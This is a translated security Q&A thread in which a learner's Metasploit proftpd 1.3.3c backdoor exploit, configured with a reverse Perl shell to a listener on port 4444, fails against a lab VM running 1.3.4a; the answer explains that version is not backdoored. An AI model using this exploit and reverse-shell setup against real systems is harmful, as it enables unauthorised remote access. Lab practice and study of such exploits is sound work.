首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >proftpd后门不背门

proftpd后门不背门
EN

Security用户
提问于 2018-04-30 06:19:16
回答 1查看 3.7K关注 0票数 0

我想练习利用proftpd后门开发系统。我使用利用proftpd_133c_backdoor和有效载荷reverse_perl.I学习如何利用这个链接,https://www.youtube.com/watch?v=1Rp5_QysRpE&t=2s

攻击者虚拟机是192.168.19.2。我的受害者虚拟机是192.168.19.5(proftpd 1.3.4a.)在受害者上打开的端口为21,版本号为proFTPD 1.3.4a

下面是利用漏洞和有效负载的配置。

代码语言:javascript
复制
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.19.5   yes       The target address
RPORT  21               yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 LHOST  192.168.19.2   yes       The listen address
 LPORT  4444             yes       The listen port


 Exploit target:

 Id  Name
 --  ----
 0   Automatic

然后,我利用它,但它说不是后门。结果如下所示。

代码语言:javascript
复制
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.19.2:4444 
[*] 192.168.19.5:21 - Sending Backdoor Command
[-] 192.168.19.5:21 - Not backdoored
[*] Exploit completed, but no session was created.

实现这种利用的解决方案是什么?怎么做?请帮帮我。谢谢。

EN

回答 1

Security用户

发布于 2018-04-30 06:33:22

我利用proftpd_133c_backdoor .

文献资料您可以看到:

此模块利用添加到ProFTPD下载存档中的恶意后门进行攻击。这个后门出现在2010年11月28日至2010年12月2日的proftpd-1.3.3c.tar.Bz2\gz档案中。

但是,很明显,您使用的是不受此后门影响的proftpd版本:

我的受害者虚拟机..。方案1.3.4a

难怪它不起作用。事实上,它不起作用的是预期的行为。

票数 2
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/184878

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档